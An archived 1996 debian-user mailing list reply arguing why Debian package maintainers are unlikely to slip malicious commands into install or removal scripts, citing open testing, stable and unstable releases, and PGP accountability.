Re: Protections against a mad maintainer?

To: Jean Orloff <orloff@lapp.in2p3.fr>
Cc: debian-user@lists.debian.org
Subject: Re: Protections against a mad maintainer?
From: "Susan G. Kleinmann" <sgk@sgk.tiac.net>
Date: Wed, 11 Sep 1996 08:50:23 -0400
Message-id: <[🔎] 199609111250.IAA15333@sgk.tiac.net>
In-reply-to: Your message of "Wed, 11 Sep 1996 11:53:56 +0200." <[🔎] m0v0lzY-000PV8C@lappc-th4>

Hi Jean --

There are (at least) 3 counterarguments to the concern that Debian 
maintainers could maliciously add dangerous commands to their 
{pre,post}{inst,rm} scripts:
-- the same package system which is open to many for development is 
equally open to many for testing.
-- by having both "stable" and "unstable" releases, Debian distinguishes 
between packages which are [likely to have been] tested and those which 
are not.
-- as the saying goes, "Never interpret as malicious that which could 
also be explained by stupidity."   Humans at commercial software firms
are no more protected from their own stupidity than humans who are working
to provide free software, _and_ who are offering the world the opportunity
to scrutinize their source code.  

Another way to pose the question is, what would motivate a developer to
include mailicious software?  He could be pretty sure that the offending
code would be found quickly, and he would be identified (via PGP keys)
with the problem.  The perpetrator would be immediately banned from 
using the system.  And all he got for his trouble was to inconvenience one
or a few unknown, randomly selected, victims.  Not a very good tradeoff.

All the same questions being asked of free software should be asked, 
of course, of the commercial software...  

HTH,
Susan Kleinmann

Reply to:

References:
- Protections against a mad maintainer?
  - From: Jean Orloff <orloff@lapp.in2p3.fr>

Prev by Date: Re: apache package
Next by Date: Re: apache package
Previous by thread: Re: Protections against a mad maintainer?
Next by thread: Re: Protections against a mad maintainer?
Index(es):
- Date
- Thread